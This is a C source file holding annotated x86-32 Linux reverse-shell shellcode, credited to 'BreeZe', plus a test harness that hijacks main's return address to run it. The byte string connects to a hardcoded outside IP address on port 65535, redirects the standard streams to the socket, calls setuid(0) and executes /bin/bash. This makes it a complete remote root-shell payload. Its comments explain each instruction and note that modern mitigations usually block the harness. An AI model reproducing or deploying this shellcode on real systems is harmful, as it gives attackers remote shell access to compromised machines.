/*
 * connectback, setuid, execve /bin/bash linux shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "setuid(0), connectback execve /bin/bash /bin/bash 0 to port 65535"

#include <stdio.h>
#include <string.h>

/*
 * Raw x86-32 Linux byte string.  Sequence: socket() and connect() through
 * socketcall (int 0x80, %al = 0x66) to the IPv4 address and port embedded
 * as immediates in the connect part; dup2() of the socket onto fds 0, 1, 2;
 * setuid(0); then execve("/bin/bash", {"/bin/bash", NULL}, {NULL}).
 *
 * Reading notes:
 *  - the socketcall argument arrays and the sockaddr_in are built with
 *    %ebp-relative stores at 0x8..0x1b(%ebp), i.e. the code relies on a
 *    writable stack frame above %ebp;
 *  - the three dup2 calls reuse %ebx == 3 (left over from SYS_CONNECT) as
 *    the socket descriptor, so the sample assumes the socket became fd 3;
 *  - the tail after the call at G2C is data ("/bin/bash" plus 9 filler
 *    bytes), not code; the disassembler mnemonics there are meaningless.
 */
char shellcode[] =    

/* socket(AF_INET=2, SOCK_STREAM=1, 0): argument array at 0x8(%ebp), %ebx = SYS_SOCKET (1) */
"\x31\xc0"			// xor    %eax,%eax
"\x89\x45\x10"			// mov    %eax,0x10(%ebp)   args[2] = protocol 0
"\x40"				// inc    %eax
"\x89\xc3"			// mov    %eax,%ebx         %ebx = 1 = SYS_SOCKET
"\x89\x45\x0c"			// mov    %eax,0xc(%ebp)    args[1] = SOCK_STREAM (1)
"\x40"				// inc    %eax
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)    args[0] = AF_INET (2)
"\x8d\x4d\x08"			// lea    0x8(%ebp),%ecx    %ecx -> argument array
"\xb0\x66"			// mov    $0x66,%al         socketcall
"\xcd\x80"			// int    $0x80             %eax = socket fd

/* connect: sockaddr_in built at 0x14(%ebp), args {fd, &addr, 16} at 0x8(%ebp), %ebx = SYS_CONNECT (3) */
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)    args[0] = socket fd from above
"\x43"				// inc    %ebx              %ebx = 2
"\x89\x5d\x14"			// mov    %ebx,0x14(%ebp)   sin_family = AF_INET (2)
"\x43"				// inc    %ebx              %ebx = 3 = SYS_CONNECT
"\x66\xc7\x45\x16\xff\xff"	// movw   $0xffff,0x16(%ebp) (sin_port: 65535 -> 0xffff, identical in either byte order)
"\xc7\x45\x18\xc6\x51\x81\x64"	// movl   $0x648151c6,0x18(%ebp) (sin_addr: 198.81.129.100, stored as bytes c6 51 81 64)
"\x8d\x55\x14"			// lea    0x14(%ebp),%edx   %edx -> sockaddr_in
"\x89\x55\x0c"			// mov    %edx,0xc(%ebp)    args[1] = &addr
"\xc6\x45\x10\x10"		// movb   $0x10,0x10(%ebp)  args[2] = addrlen 16
"\xb0\x66"			// mov    $0x66,%al         socketcall
"\xcd\x80"			// int    $0x80

/* dup2(3, 0): %ebx is still 3 (SYS_CONNECT) and is reused as the socket fd */
"\x31\xc9"			// xor    %ecx,%ecx         newfd = 0 (stdin)
"\xb0\x3f"			// mov    $0x3f,%al         dup2
"\xcd\x80"			// int    $0x80

/* dup2(3, 1) */
"\x41"				// inc    %ecx              newfd = 1 (stdout)
"\xb0\x3f"			// mov    $0x3f,%al         dup2
"\xcd\x80"			// int    $0x80

/* dup2(3, 2) */
"\x41"				// inc    %ecx              newfd = 2 (stderr)
"\xb0\x3f"			// mov    $0x3f,%al         dup2
"\xcd\x80"			// int    $0x80

/* jump to G2C: +0x22 = 34 bytes forward, over the setuid/execve block, to the call that pushes the string address */
"\xeb\x22"			// jmp    80480ed <G2C>

/* start <shellcode>: reached via the call at G2C, with the address of the string tail on the stack */
/* setuid(0) */
"\x31\xc0"			// xor    %eax,%eax
"\x31\xdb"			// xor    %ebx,%ebx         uid = 0
"\xb0\x17"			// mov    $0x17,%al         setuid
"\xcd\x80"			// int    $0x80

/* execve("/bin/bash", argv, envp) -- the path in the data tail is /bin/bash, not /bin/sh */
"\x5e"				// pop    %esi              %esi -> "/bin/bash" pushed by the call
"\x31\xc0"			// xor    %eax,%eax
"\x88\x46\x09"			// mov    %al,0x9(%esi)     NUL-terminate the path (offset 9)
"\x8d\x1e"			// lea    (%esi),%ebx       %ebx = path pointer
"\x89\x5e\x0a"			// mov    %ebx,0xa(%esi)    argv[0] = path, stored at offset 0xa
"\x89\x46\x0e"			// mov    %eax,0xe(%esi)    argv[1] = NULL, stored at offset 0xe
"\xb0\x0b"			// mov    $0xb,%al          execve
"\x89\xf3"			// mov    %esi,%ebx         arg0: path
"\x8d\x4e\x0a"			// lea    0xa(%esi),%ecx    arg1: argv
"\x8d\x56\x0e"			// lea    0xe(%esi),%edx    arg2: envp = &NULL (empty environment)
"\xcd\x80"			// int    $0x80

/* G2C: the call pushes the address of the bytes that follow it and jumps back to <shellcode> */
"\xe8\xd9\xff\xff\xff"		// call   80480cb <shellcode>  (-0x27 = -39 bytes)
"\x2f"				// '/'          string data "/bin/bash" (not code; ignore disassembler output here)
"\x62\x69\x6e"			// "bin"
"\x2f"				// '/'
"\x62\x61\x73"			// "bas"
"\x68\x54\x52\x4f\x45"		// 'h' + "TROE"  offset 9 onward is filler
"\x50"				// 'P'
"\x4a"				// 'J'
"\x55"				// 'U'
"\x48"				// 'H'
"\x53"				// 'S'          filler offsets 9..17 receive the NUL, argv[0] and NULL stores above
;

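/*
 * Test harness: prints the sample's description and byte length, then
 * overwrites main's saved return address with the address of `shellcode`
 * so the bytes execute when main returns.
 *
 * `(int *)&ret + 2` hard-codes a 32-bit x86 frame layout (ret, saved %ebp,
 * return address) built without a stack protector, and `(int)shellcode`
 * assumes 32-bit pointers.  On current toolchains (non-executable .data,
 * stack canaries, 64-bit pointers) this typically aborts or faults instead
 * of running, which is the expected result for a mitigated build.
 *
 * Returns 0 (only reached if the return-address overwrite has no effect).
 */
int
main(void)
{
	int *ret;

	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n", info);
	/* strlen() returns size_t, so %zu rather than %d */
	printf("Shellcode length = %zu\n", strlen(shellcode));
	(*ret) = (int)shellcode;
	return 0;
}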
